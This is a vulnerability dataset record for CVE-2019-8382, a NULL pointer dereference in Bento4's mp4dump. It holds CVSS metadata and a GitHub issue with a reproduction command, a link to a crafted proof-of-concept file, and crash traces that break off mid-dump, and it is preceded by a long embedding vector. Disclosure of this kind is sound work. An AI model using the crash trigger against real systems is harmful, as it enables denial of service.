-0.015000996179878712, -0.0035831371787935495, 0.0017579292180016637, -0.01333421841263771, 0.013108509592711926, -0.004258095286786556, 0.0009174871374852955, -0.005226041190326214, -0.008407676592469215, -0.01726677082479, -0.017058424651622772, 0.014228375628590584, -0.0009207425755448639, -0.0065282112918794155, -0.003320532850921154, 0.04177360609173775, -0.013021698221564293, 0.013802999630570412, 0.02107778750360012, -0.009314854629337788, 0.01675458438694477, -0.01577361673116684, 0.009080464020371437, -0.013299494050443172, -0.005950916092842817, -0.01088613923639059, 0.006927543319761753, 0.014124201610684395, -0.01258764136582613, 0.018820693716406822, 0.00928881112486124, 0.012683133594691753, -0.003253254108130932, -0.02085207961499691, -0.018716519698500633, 0.011693485081195831, 0.006254755426198244, -0.002254924038425088, 0.019341561943292618, -0.006311182864010334, -0.004696492571383715, 0.003036225913092494, -0.004143070429563522, -0.008177625946700573, -0.020591644570231438, 0.011667441576719284, 0.0009815105004236102, 0.009384303353726864, 0.00784340314567089, 0.009037057869136333, 0.0012924035545438528, 0.010009344667196274, -0.002554423175752163, -0.008984971791505814, -0.03508913516998291, 0.013898491859436035, 0.012804669328033924, 0.029585298150777817, 0.004635724239051342, -0.009436390362679958, -0.005191316828131676, -0.022466769441962242, 0.004054088611155748, -0.00036650654510594904, -0.014124201610684395, -0.010478125885128975, -0.010851414874196053, 0.020209675654768944, -0.011936556547880173, 0.035592641681432724, 0.03225908800959587, -0.0019586803391575813, 0.0032489136792719364, 0.0031968269031494856, 0.01457562018185854, -0.002027044305577874, 0.010938226245343685, -0.012283802032470703, -0.0027171943802386522, 0.03429047018289566, 0.008051750250160694, 0.011927875690162182, 0.01417628861963749, 0.012900162488222122, -0.0003325958678033203, 0.030262425541877747, 0.01111184898763895, 0.024758588522672653, 0.013247407041490078, -0.0018176119774580002, -0.001359682297334075, 0.006029046140611172, -0.00021553623082581908, -0.011380963958799839, -0.014558258466422558, 0.005087143275886774, 0.022241059690713882, 0.01258764136582613, -0.008160264231264591, -0.001489899237640202, 0.00453155068680644, -0.016728540882468224, 0.02279665321111679, -0.018768606707453728, 0.006397994235157967, -0.0236821286380291, -0.004188646096736193, 0.0040150233544409275, 0.02621701918542385, 0.024185633286833763, -0.02986309304833412, 0.02552252821624279, 0.009974620305001736, 0.00635458854958415, -0.0013531714212149382, 0.0096794618293643, -0.002400333061814308, -0.0074570924043655396, 0.0019358923891559243, -0.026164932176470757, -0.010191649198532104, -0.013368942774832249, 0.0014757923781871796, 0.003348746569827199, 0.007326875347644091, -0.011354920454323292, 0.01127678994089365, -0.0020997487008571625, -0.01041735801845789, -0.005608011037111282, -0.02517528273165226, -0.007791315671056509, -0.005851082969456911, 0.012613684870302677, 0.017726872116327286, -0.023317519575357437, -0.01833455078303814, -0.009019696153700352, 0.01652887463569641, -0.005707844160497189, 0.008633385412395, -0.015504501760005951, -0.006541233044117689, -0.030019354075193405, 0.007157593499869108, -0.02187645249068737, -0.013646739535033703, -0.007049079053103924, 0.022518856450915337, -0.008485806174576283, -0.01628580316901207, -0.0060941544361412525, -0.0024046734906733036, 0.011528543196618557, 0.004969947971403599, -0.014323867857456207, -0.011059761978685856, -0.01960199512541294, -0.017648741602897644, -0.023143896833062172, -0.021459758281707764, -0.010078794322907925, -0.007600331213325262, -0.006172284949570894, 0.018421361222863197, -0.009523201733827591, 0.001920700422488153, -0.02746710181236267, 0.013863767497241497, 0.006836391519755125, 0.025609338656067848, -0.0031686131842434406, -0.0022592644672840834, 0.01685875840485096, 0.006207009311765432, -0.019515184685587883, -0.003704673144966364, -0.0188901424407959, -0.0005800081416964531, -0.0010553001193329692, -0.004386141896247864, -0.023334883153438568, -0.0019196153152734041, 0.025157921016216278, 0.0057642715983092785, -0.0036156915593892336, 0.016520194709300995, 0.006641065701842308, -0.014046071097254753, -0.012327207252383232, 0.009523201733827591, 0.002708513056859374, -0.012552917003631592, 0.028196316212415695, 0.012457423843443394, -0.00327495695091784, 0.014749242924153805, 0.012535554356873035, 0.007756591308861971, -0.027033044025301933, -0.031720854341983795, -0.02460232749581337, -0.0030904829036444426, -0.023855751380324364, 0.01457562018185854, -0.009419027715921402, 0.01053889375180006, 0.001773121184669435, -0.0035201990976929665, 0.016233716160058975, 0.012752583250403404, 0.010521532036364079, -0.0006830965867266059, 0.00781301874667406, 0.011936556547880173, 0.007930213585495949, -0.0032272108364850283, -0.02003605291247368, -0.025019021704792976, 0.0015984134515747428, -0.020105501636862755, 0.002645574975758791, -0.021268773823976517, -0.010521532036364079, 0.010070113465189934, 0.004844071809202433, -0.0033964929170906544, 0.006866775453090668, -0.011797658167779446, -0.023890474811196327, -0.0038848065305501223, -0.0152701111510396, 0.010660430416464806, 0.02915124036371708, -0.011658759787678719, -0.0021279624197632074, -0.007891149260103703, -0.00367211876437068, -0.014853416942059994, 0.007118528243154287, 0.010981631465256214, -0.008364270441234112, -0.028734546154737473, -0.017848407849669456, -0.02902970463037491, 0.03955123573541641, 0.0037415679544210434, -0.004043237306177616, -0.021581294015049934, -0.004390482325106859, 0.003975958563387394, 0.007331215776503086, -0.010946907103061676, 0.002817027270793915, 0.014315186999738216, -0.01514857541769743, -0.0005778378690592945, 0.0050914837047457695, 0.025696150958538055, 0.00020590559870470315, 0.005720865912735462, 0.026477452367544174, 0.0016895652515813708, -0.001320617157034576, 0.018056754022836685, 0.009019696153700352, -0.008646407164633274, 0.012639728374779224, 0.015738891437649727, -0.028092142194509506, -0.004245073534548283, -0.01690216362476349, -0.0022744566667824984, 0.020591644570231438, 0.0061419010162353516, -0.01994924061000347, -0.0005292777786962688, -0.008442400954663754, 0.004535891581326723, 0.0037654410116374493, -0.006888478063046932, 0.003279297612607479, 0.005668779369443655, 0.004073621239513159, 0.013742231763899326, -0.0047789630480110645, -0.009939895942807198, 0.0023612678050994873, -0.003064439631998539, -0.014488808810710907, -0.006107176188379526, -0.013863767497241497, -0.00396293681114912, -0.005560264922678471, -0.011867106892168522, -0.007951917126774788, 0.0024350574240088463, -0.0332660973072052, 0.023057086393237114, 0.011259428225457668, -0.009549245238304138, 0.0005707844393327832, -0.017561929300427437, -0.0019163598772138357, 0.010938226245343685, -0.01619899272918701, 0.006593319587409496, -0.017075786367058754, -0.0027736215852200985, 0.04156525805592537, 0.009766273200511932, -0.008616023696959019, 0.002743237651884556, -0.010096156038343906, -0.00800834409892559, 0.0013401497853919864, -0.000983680714853108, -0.006966608576476574, 0.025210006162524223, -0.010625705122947693, -0.018299825489521027, 0.005877126473933458, -0.001852336572483182, -0.019636720418930054, -0.0033400654792785645, 0.0020704499911516905, -0.04486408829689026, 0.005959596950560808, 0.017692146822810173, 0.0011491648619994521, 0.0004766483907587826, 0.005282468628138304, -0.023439055308699608, -0.01577361673116684, 0.018386637791991234, 0.006610681768506765, 0.014106838963925838, 0.012778625823557377, 0.004939564038068056, 0.013134552165865898, -0.025036385282874107, -0.010564937256276608, -0.0016960761277005076, 0.009592650458216667, -0.01925475150346756, -0.000020702464098576456, 0.009132551029324532, 0.016251079738140106, -0.005903169512748718, 0.028213677927851677, -0.009540564380586147, 0.0171018298715353, 0.01184974517673254, 0.00035239968565292656, -0.006432718597352505, 0.0033010004553943872, -0.004323203582316637, -0.012275120243430138, 0.019220026209950447, 0.015843065455555916, -0.003726375987753272, -0.0012793818023055792, 0.0025978286284953356, -0.012795988470315933, -0.006193987559527159, 0.009245405904948711, -0.00069394800812006, 0.0046878112480044365, 0.011919193901121616, 0.014332548715174198, 0.008659428916871548, -0.007135890424251556, -0.01048680767416954, 0.0006532551487907767, 0.026494814082980156, 0.012292482890188694, 0.0017416521441191435, -0.008064772002398968, -0.004310181830078363, -0.00557762710377574, -0.007990982383489609, 0.008646407164633274, 0.0014996655518189073, -0.012839393690228462, 0.020001327618956566, -0.008273119106888771, 0.007044738624244928, 0.02232787199318409, -0.006246074568480253, 0.013759594410657883, -0.007656758185476065, 0.008242734707891941, 0.02711985632777214, 0.003949915058910847, 0.00500901322811842, 0.007799996994435787, -0.024202995002269745, -0.01549582090228796, 0.009497158229351044, -0.006367610301822424, -0.007010013796389103, -0.013742231763899326, -0.01201468612998724, -0.006133219692856073, -0.004557594191282988, 0.03837060183286667, 0.014332548715174198, -0.018542896956205368, 0.010504169389605522, 0.019428372383117676, 0.01236193161457777, -0.008490147069096565, 0.006701834034174681, 0.005816358607262373, 0.02005341462790966, -0.005408345256000757, -0.003478963626548648, 0.0023417354095727205, 0.009115188382565975, -0.016442064195871353, -0.0034312172792851925, 0.013186639174818993, 0.008802668191492558, 0.0041040051728487015, 0.013342900201678276, 0.0016928206896409392, 0.01960199512541294, 0.006936224177479744, 0.017153916880488396, -0.01845608651638031, -0.013976622372865677, 0.024758588522672653, 0.005733887664973736, 0.01568680629134178, -0.01981034316122532, -0.0025457418523728848, -0.013377624563872814, 0.00792587362229824, -0.0011209511430934072, -0.005386642180383205, -0.004930882714688778, 0.005903169512748718, -0.002645574975758791, 0.005178295075893402, 0.023560592904686928, 0.002328713657334447, 0.009991982951760292, 0.01868179626762867, 0.024428704753518105, 0.002571785356849432, 0.023664765059947968, 0.0012837223475798965, 0.023317519575357437, 0.018160928040742874, -0.0060767922550439835, 0.0038435710594058037, -0.00408230209723115, 0.01732753962278366, -0.0074397302232682705, -0.007908510975539684, 0.009410346858203411, -0.011563267558813095, 0.009774954989552498, 0.006792985834181309, 0.008720196783542633, 0.028213677927851677, 0.003507177345454693, 0.02986309304833412, 0.0120754549279809, -0.002186560072004795, -0.029706833884119987, 0.013073784299194813, 0.008425038307905197, -0.024307169020175934, -0.0036851405166089535, 0.01708446815609932, -0.004696492571383715, -0.005499497056007385, 0.004857093095779419, -0.018508173525333405, 0.012943567708134651, 0.0016439893515780568, -0.01469715591520071, 0.008507509715855122, -0.004878796171396971, 0.009714186191558838, 0.005425707437098026, 0.004770282190293074, 0.017917856574058533, 0.0006830965867266059, -0.004197327420115471, -0.007418027147650719, -0.010894820094108582, 0.0015474117826670408, 0.019549909979104996, -0.03111317753791809, 0.003891317406669259, -0.006306842435151339, 0.0193589236587286, -0.00956660695374012, 0.009922534227371216, 0.019393648952245712, -0.020348573103547096, -0.013690144754946232, -0.020244399085640907, 0.0011676122667267919, 0.006085473578423262, 0.010009344667196274, 0.023421693593263626, -0.008915522135794163, 0.009149912744760513, 0.013125871308147907, -0.002743237651884556, 0.011806339025497437, 0.022848738357424736, 0.0072183613665401936, -0.010747240856289864, -0.003235891927033663, 0.009297491982579231, -0.0006065940833650529, -0.03137361258268356, -0.0007948661223053932, -0.005638394970446825, 0.02755391225218773, 0.004518528934568167, 0.023195983842015266, -0.006910181138664484, -0.017518524080514908, -0.020209675654768944, -0.013681463897228241, -0.007582968566566706, 0.020695818588137627, 0.027519188821315765, -0.01743171364068985, -0.02097361534833908, -0.016494151204824448, 0.000660308578517288, 0.01638997718691826, 0.011832382529973984, -0.0161642674356699, -0.001222954480908811, -0.016112180426716805, 0.01741435006260872, 0.006133219692856073, -0.007374621462076902, 0.03135624900460243, 0.017796320840716362, -0.023300157859921455, -0.015764934942126274, -0.01286543719470501, 0.00007073766028042883, 0.0021670274436473846, 0.002040066057816148, -0.010156923905014992, 0.002186560072004795, -0.0217549167573452, 0.002565274480730295, 0.003711183788254857, -0.021477119997143745, -0.0007655672961845994, 0.0037654410116374493, -0.00013883029168937355, -0.0026368938852101564, 0.008255756460130215, 0.004216860048472881, 0.015591313131153584, 0.00047230784548446536, -0.08208878338336945, 0.01636393368244171, -0.005117527209222317, -0.0002957010583486408, 0.023560592904686928, -0.001195825869217515, 0.005898829083889723, 0.005516859237104654, -0.001506176427938044, 0.0067669423297047615, -0.008598661050200462, -0.029585298150777817, -0.005738228093832731, 0.015903834253549576, 0.014228375628590584, -0.011242065578699112, 0.007227042224258184, 0.011250747367739677, 0.015417690388858318, 0.006376291625201702, -0.016094818711280823, 0.0127091770991683, -0.02461968921124935, -0.0053605991415679455, -0.00874624028801918, -0.014080796390771866, 0.013473116792738438, -0.009731548838317394, -0.013342900201678276, -0.017865769565105438, 0.00581201771274209, 0.00866376981139183, -0.010096156038343906, 0.0188901424407959, -0.0010449913097545505, -0.02474122680723667, -0.021737555041909218, -0.012552917003631592, 0.0016353082610294223, -0.008329546079039574, 0.001982553396373987, -0.006875456310808659, 0.007613352499902248, -0.000795951287727803, -0.004166943486779928, 0.0025414014235138893, -0.00677562365308404, 0.01355124730616808, -0.012752583250403404, 0.014558258466422558, -0.010834052227437496, 0.0028235381469130516, -0.002639064099639654, -0.016806671395897865, 0.0041626025922596455, 0.020470108836889267, -0.0108774583786726, -0.007383302785456181, -0.01581702195107937, -0.031061090528964996, 0.013577289879322052, -0.01823037676513195, 0.014306505210697651, -0.007248745299875736, -0.0029081793036311865, -0.0022744566667824984, 0.008603001944720745, 0.003567945212125778, 0.015947239473462105, -0.006714855320751667, 0.007378962356597185, 0.002452419837936759, 0.011181297712028027, -0.001022745855152607, -0.0018946570344269276, 0.008563936688005924, -0.016294484958052635, -0.003162102308124304, -0.0029212008230388165, 0.004182135220617056, 0.015461095608770847, -0.002790983999148011, 0.0028734547086060047, 0.006645406596362591, 0.0020075116772204638, -0.004622702952474356, 0.007266107480973005, 0.020331211388111115, 0.009427709504961967, 0.005664438474923372, 0.0013781297020614147, 0.010721198283135891, 0.003303170669823885, 0.01868179626762867, 0.016416020691394806, 0.010070113465189934, -0.013577289879322052, 0.008603001944720745, 0.008056090213358402, 0.0050176940858364105, 0.005694822408258915, -0.020192312076687813, 0.005716525483876467, -0.012683133594691753, -0.0016559258801862597, -0.0023352245334535837, -0.009688143618404865, -0.006332885939627886, 0.0020075116772204638, -0.01145909447222948, 0.022640392184257507, 0.009991982951760292, 0.012387975119054317, -0.0035657749976962805, -0.017935218289494514, 0.01076460350304842, 0.010156923905014992, -0.0004750207008328289, -0.009879128076136112, -0.013533884659409523, -0.020244399085640907, -0.009610013104975224, 0.00464440556243062, 0.004809346981346607, -0.015365603379905224, -0.0015994985587894917, -0.007274788338690996, 0.006588979158550501, -0.011137892492115498, -0.003991150297224522, 0.010556256398558617, 0.007183636538684368, -0.0016472447896376252, 0.005048078019171953, 0.022397320717573166, -0.005660098046064377, 0.02345641888678074, -0.005963937845081091, 0.018143566325306892, -0.005621032789349556, -0.01150249969214201, 0.00017484342970419675, 0.01658964343369007, -0.005095824599266052, -0.025921860709786415, 0.006927543319761753, -0.022744566202163696, 0.016806671395897865, 0.006562935654073954, -0.004570615943521261, 0.0015137724112719297, 0.016008006408810616, -0.009245405904948711, 0.018838055431842804, -0.0018176119774580002, -0.0071532526053488255, 0.01077328436076641, 0.015417690388858318, 0.017058424651622772, 0.008611682802438736, -0.0012999995378777385, 0.015912514179944992, -0.004969947971403599, 0.010391314513981342, -0.010721198283135891, -0.0029537552036345005, -0.005343236494809389, -0.0008312183781526983, -0.004073621239513159, 0.017813682556152344, 0.005234722513705492, 0.021494481712579727, -0.007821699604392052, 0.0040150233544409275, 0.0019358923891559243, 0.014992314390838146, -0.014028709381818771, -0.01777895726263523, 0.012066773138940334, -0.01162403542548418, 0.009783635847270489, -0.005260766018182039, 0.012006005272269249, -0.010712516494095325, -0.0011795487953349948, -0.0122403958812356, 0.0003773579664994031, 0.0047789630480110645, 0.005894488655030727, 0.010834052227437496, 0.03208546340465546, 0.039933208376169205, -0.0036959918215870857, -0.0034377281554043293, -0.00042944474262185395, 0.013134552165865898, -0.0025175283662974834, 0.004674789495766163, -0.018473448231816292, -0.003784973407164216, 0.0050003319047391415, 0.00666276877745986, 0.0066757905296981335, 0.008633385412395, -0.011016356758773327, -0.013238726183772087, -0.011059761978685856, -0.0013803000329062343, 0.006918861996382475, 0.010573619045317173, 0.028665097430348396, -0.0028409003280103207, -0.003652586368843913, 0.00423422222957015, -0.01270049624145031, -0.0154350521042943, -0.007543903775513172, 0.009262767620384693, -0.010356590151786804, 0.03128679841756821, 0.015764934942126274, 0.010964269749820232, 0.011467775329947472, -0.0014009176520630717, 0.0005539647536352277, -0.024289807304739952, 0.01492286566644907, 0.011771614663302898, 0.021251410245895386, 0.0241509098559618, -0.005226041190326214, 0.000722161668818444, 0.003405174007639289, 0.013160595670342445, -0.0002225896460004151, 0.013846405781805515, 0.0017351412680000067, -0.01224907673895359, 0.01162403542548418, 0.00928013026714325, 0.012969611212611198, 0.0055255405604839325, -0.0013846405781805515, -0.011780296452343464, -0.012969611212611198, 0.01418496947735548, 0.02220633625984192, -0.002250583376735449, 0.018143566325306892, -0.012969611212611198, 0.004965607542544603, -0.03687744960188866, -0.014167606830596924, 0.021668104454874992, 0.010512851178646088, 0.006862434558570385, -0.004206008277833462, 0.002395992400124669, 0.006246074568480253, -0.001795909134671092, -0.009297491982579231, -0.008142901584506035, 0.013151914812624454, 0.018612347543239594, -0.01761401630938053, 0.003726375987753272, -0.0012500829761847854, -0.03495023772120476, 0.0003347661404404789, 0.005061099771410227, 0.005586308427155018, -0.012787307612597942, -0.0020129375625401735, -0.012908843345940113, -0.0062894802540540695, 0.001320617157034576, 0.013481797650456429, 0.005069781094789505, -0.02666843682527542, -0.02267511747777462, -0.004106175620108843, -0.03432519733905792, -0.01645074412226677, -0.006519529968500137, -0.001365107949823141, 0.005529880989342928, -0.014731881208717823, -0.001507261535152793, 0.0014714518329128623, 0.011554586701095104, 0.005538562312722206, 0.006658428348600864, -0.010721198283135891, -0.008073452860116959, -0.027831709012389183, -0.00506544066593051, 0.01293488685041666, 0.011025037616491318, 0.0018165268702432513, -0.007235723547637463, 0.0028864764608442783, 0.012162265367805958, -0.02244940772652626, -0.008147242479026318, 0.004488145001232624, -0.006081132683902979, 0.015582631342113018, -0.01099899411201477, 0.002328713657334447, 0.01355992816388607, 0.005013353656977415, 0.013412348926067352, 0.004383971448987722, 0.0028864764608442783, -0.014896822161972523, 0.022588305175304413, 0.012205671519041061, -0.01577361673116684, -0.004008512478321791, -0.025435715913772583, -0.01753588579595089, 0.013898491859436035, -0.0034420688170939684, 0.011563267558813095, 0.00617662537842989, 0.01258764136582613, 0.007730547804385424, 0.009158594533801079, 0.005790315102785826, 0.015591313131153584, 0.0236821286380291, 0.003405174007639289, -0.01744907535612583, 0.012952248565852642, -0.0011339728953316808, 0.01162403542548418, -0.013802999630570412, -0.014228375628590584, -0.030488135293126106, 0.007582968566566706, 0.0062156906351447105, 0.01270049624145031, -0.005846742540597916, 0.0009549245005473495, 0.005291149951517582, -0.010946907103061676, 0.0033010004553943872, 0.016259759664535522, 0.01259632222354412, 0.00009650977153796703, -0.006866775453090668, 0.005364939570426941, 0.021720191463828087, 0.02552252821624279, 0.03442936763167381, -0.007869445718824863, 0.004034555982798338, -0.019046403467655182, -0.011189979501068592, 0.017848407849669456, -0.005351917818188667, -0.026269104331731796, -0.0021550909150391817, -0.022258421406149864, -0.022362595424056053, 0.016086136922240257, 0.021442396566271782, 0.013377624563872814, 0.013464435935020447, -0.004574956372380257, 0.015165937133133411, -0.01747511886060238, 0.014836054295301437, 0.0779912918806076, 0.01790049485862255, 0.00216377223841846, 0.004197327420115471, 0.016711179167032242, -0.002814857056364417, -0.010964269749820232, 0.05819830670952797, -0.0028278788086026907, 0.02962002158164978, 0.0009961598552763462, 0.005555924493819475, 0.02017495036125183, -0.00858129933476448, -0.003819698002189398, -0.008802668191492558, 0.012327207252383232, 0.00009121970651904121, 0.009601332247257233, -0.004028045106679201, 0.0034941555932164192, -0.0019131044391542673, 0.002398162614554167, -0.0017101829871535301, -0.00006398943514795974, -0.00652387086302042, -0.014540895819664001, -0.020799992606043816, -0.0026824697852134705, 0.03152986988425255, -0.012743901461362839, 0.00311652640812099, -0.011137892492115498, -0.0074397302232682705, -0.011797658167779446, 0.0012435721000656486, -0.002623872132971883, 0.039585962891578674, -0.007040398195385933, -0.012144903652369976, -0.0032771273981779814, 0.0037068433593958616, 0.01581702195107937, 0.00956660695374012, 0.010408677160739899, 0.00427111703902483, -0.014193650335073471, -0.007001332938671112, 0.01493154652416706, -0.004891817923635244, 0.008637726306915283, -0.0023200325667858124, 0.019063765183091164, -0.009271448478102684, 0.004462101962417364, 0.007435389328747988, 0.02777962200343609, 0.00928013026714325, 0.0016407339135184884, -0.0017546737799420953, 0.007830381393432617, -0.01196260005235672, -0.009201999753713608, -0.0018111011013388634, -0.006480465177446604, 0.0003431759832892567, -0.03338763490319252, -0.019897153601050377, -0.000954381946939975, -0.013646739535033703, -0.011754252947866917, -0.021911177784204483, 0.0034594309981912374, -0.005330215208232403, 0.017049742862582207, -0.01246610563248396, 0.02949848584830761, -0.007088144309818745, 0.004396993201225996, -0.010703835636377335, -0.008485806174576283, 0.015469777397811413, -0.016259759664535522, 0.012032048776745796, 0.009922534227371216, 0.000943530525546521, -0.0004459931515157223, 0.005529880989342928, -0.012683133594691753, 0.012830712832510471, -0.005529880989342928, -0.00423422222957015, -0.011094486340880394, -0.003917360678315163, -0.010504169389605522, -0.007444070652127266, 0.010269778780639172, 0.005295490380376577, -0.0017883131513372064, -0.00901101529598236, 0.0009603502112440765, 0.008485806174576283, -0.008720196783542633, -0.0037871438544243574, 0.001558263204060495, 0.015018357895314693, 0.02232787199318409, 0.0003977043670602143, 0.0003602669748943299, -0.016719860956072807, 0.0015224535018205643, 0.011919193901121616, -0.008958928287029266, 0.003880465868860483, -0.005907510407269001, -0.011641398072242737, -0.011189979501068592, 0.003335725050419569, -0.0013108509592711926, -0.022050075232982635, 0.003819698002189398, 0.008950247429311275, 0.0026151910424232483, 0.007869445718824863, 0.01224907673895359, 0.01088613923639059, 0.018247738480567932, 0.0038544225972145796, 0.0018783799605444074, 0.03340499475598335, 0.013533884659409523, 0.004475123714655638, -0.005547243170440197, -0.0007189062307588756, 0.02402937225997448, 0.000770450453273952, 0.01800466701388359, -0.012049411423504353, -0.014436722733080387, 0.023716852068901062, 0.013351581059396267, -0.010972950607538223, 0.01708446815609932, 0.004948245361447334, 0.005677460227161646, 0.026060758158564568, 0.004370949696749449, 0.0033118517603725195, 0.020418021827936172, -0.0020606836769729853, 0.01321268267929554, -0.016537556424736977, -0.004514188505709171, 0.0036287130787968636, 0.008372951298952103, -0.010573619045317173, -0.03180766850709915, 0.0009500414016656578, 0.014783967286348343, 0.014705837704241276, -0.003698162268847227, 0.0008453252376057208, 0.012344569899141788, 0.019185300916433334, 0.010052750818431377, -0.005803336855024099, -0.0036612674593925476, -0.0008914437494240701, 0.013577289879322052, -0.0020020860247313976, 0.01993187889456749, 0.01259632222354412, 0.0010558426147326827, 0.01002670731395483, -0.010564937256276608, 0.015174618922173977, -0.0020194482058286667, -0.02380366437137127, -0.014245737344026566, 0.006658428348600864, -0.013403668068349361, 0.015339559875428677, 0.009080464020371437, 0.04875323548913002, 0.0047051734291017056, 0.005573286674916744, 0.002209348138421774, 0.013204001821577549, 0.003409514669328928, -0.0027171943802386522, 0.02015758864581585, 0.03861367329955101, -0.004831050056964159, -0.011554586701095104, -0.012761264108121395, 0.003910849802196026, 0.00017240185115952045, -0.011433050967752934, -0.010209010913968086, 0.010747240856289864, 0.003327043727040291, -0.00007901186472736299, 0.003496325807645917, 0.01835191249847412, 0.0028691140469163656, 0.022709840908646584, 0.010564937256276608, 0.006866775453090668, -0.024307169020175934, -0.013429710641503334, -0.006714855320751667 ]
CVE-2019-8382
2019-02-17T02:29:00.597000
An issue was discovered in Bento4 1.5.1-628. A NULL pointer dereference occurs in the function AP4_List:Find located in Core/Ap4List.h when called from Core/Ap4Movie.cpp. It can be triggered by sending a crafted file to the mp4dump binary. It allows an attacker to cause a Denial of Service (Segmentation fault) or possibly have unspecified other impact.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ], "cvssMetricV31": null }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/364" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://research.loginsoft.com/bugs/null-pointer-dereference-vulnerability-in-function-ap4_listfind-bento4-1-5-1-628/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.5.1-628:*:*:*:*:*:*:*", "matchCriteriaId": "27A2EAA1-1740-4A14-BFFC-BD4406E9BD87", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/364
[ "Exploit", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
**Description** - we observed a NULL pointer dereference occured in function AP4_List<AP4_Track>: Find () located in Ap4List.h.The same be triggered by sending a crafted file to the mp4dump binary. It allows an attacker to cause Denial of Service (Segmentation fault) or possibly have unspecified other impact. **Command** - `./mp4dump --track 1:E791400BC075044176E34136E3C134F35E3513BE430B907B --format text $POC` **POC** - [REPRODUCER](https://github.com/SegfaultMasters/covering360/blob/master/BENTO4/POC_NP?raw=true) **Degub** - **ASAN REPORT** - ``` ASAN: DEADLYSIGNAL ================================================================= ==10246==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000030 (pc 0x55d0b61aeae7 bp 0x7ffcc696e490 sp 0x7ffcc696e460 T0) ==10246==The signal is caused by a READ memory access. ==10246==Hint: address points to the zero page. #0 0x55d0b61aeae6 in AP4_List<AP4_Track>::Find(AP4_List<AP4_Track>::Item::Finder const&, AP4_Track*&) const /home/aceteam/Desktop/packages/Bento4/Source/C++/Core/Ap4List.h:428 #1 0x55d0b61adb79 in AP4_Movie::GetTrack(unsigned int) /home/aceteam/Desktop/packages/Bento4/Source/C++/Core/Ap4Movie.cpp:148 #2 0x55d0b6161f2f in DumpTrackData(char const*, AP4_File&, AP4_Array<unsigned int> const&, AP4_ProtectionKeyMap const&) /home/aceteam/Desktop/packages/Bento4/Source/C++/Apps/Mp4Dump/Mp4Dump.cpp:183 #3 0x55d0b616304f in main /home/aceteam/Desktop/packages/Bento4/Source/C++/Apps/Mp4Dump/Mp4Dump.cpp:367 #4 0x7faa6d1a4b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #5 0x55d0b61612f9 in _start (/home/aceteam/Desktop/packages/Bento4/builds/mp4dump+0x3082f9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/aceteam/Desktop/packages/Bento4/Source/C++/Core/Ap4List.h:428 in AP4_List<AP4_Track>::Find(AP4_List<AP4_Track>::Item::Finder const&, AP4_Track*&) const ==10246==ABORTING ``` **GDB** - ``` Program received signal SIGSEGV, Segmentation fault. [ Legend: Modified register | Code | Heap | Stack | String ] ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ registers ]──── $rax : 0x20 $rbx : 0x7fffffffd7e0 → 0x0000555555da9370 → 0x0000555555869846 → <AP4_AtomFactory::~AP4_AtomFactory()+0> push rbp $rcx : 0x0 $rdx : 0x0 $rsp : 0x7fffffffd6f0 → 0x00007fffffffd730 → 0x00000001ffffd750 → 0x0000000000000000 $rbp : 0x7fffffffd720 → 0x00007fffffffd810 → 0x00007fffffffd880 → 0x00007fffffffdc70 → 0x0000555555985150 → <__libc_csu_init+0> push r15 $rsi : 0x7fffffffd7a0 → 0x0000555555da98f0 → 0x00005555558aa0fe → <AP4_TrackFinderById::~AP4_TrackFinderById()+0> push rbp $rdi : 0x20 $rip : 0x5555558a9ae7 → <AP4_List<AP4_Track>::Find(AP4_List<AP4_Track>::Item::Finder+0> mov rax, QWORD PTR [rax+0x10] $r8 : 0x6 $r9 : 0x1e $r10 : 0x7ffff7fbd000 → 0x00007ffff7fee000 → 0x00007ffff716a698 → 0x00007ffff6f09090 → repz ret $r11 : 0x7ffff64a9b97 → <__libc_start_main+231> mov edi, eax $r12 : 0x7fffffffd740 → 0x0000000041b58ab3 $r13 : 0xffffffffae8 → 0x0000000000000000 $r14 : 0x20 $r15 : 0x7fffffffd740 → 0x0000000041b58ab3 $eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification] $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $ss: 0x002b $cs: 0x0033 $gs: 0x0000 ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ stack ]──── 0x00007fffffffd6f0│+0x00: 0x00007fffffffd730 → 0x00000001ffffd750 → 0x0000000000000000 ← $rsp 0x00007fffffffd6f8│+0x08: 0x00007fffffffd760 → 0x0000000000000000 0x00007fffffffd700│+0x10: 0x00007fffffffd7a0 → 0x0000555555da98f0 → 0x00005555558aa0fe → <AP4_TrackFinderById::~AP4_TrackFinderById()+0> push rbp 0x00007fffffffd708│+0x18: 